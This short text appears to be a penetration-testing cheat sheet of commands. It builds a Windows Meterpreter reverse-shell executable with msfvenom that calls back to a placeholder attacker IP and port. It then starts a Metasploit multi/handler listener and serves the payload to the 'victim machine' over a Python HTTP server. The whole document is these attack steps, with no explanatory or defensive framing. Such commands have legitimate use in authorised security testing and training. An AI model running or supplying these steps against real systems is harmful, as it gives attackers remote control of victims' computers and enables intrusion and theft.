msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Port> -f exe -o payload.exe
Start a Listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Attacker_IP>
set LPORT <Port>
exploit
Transfer Payload to Victim Machine
python3 -m http.server 8080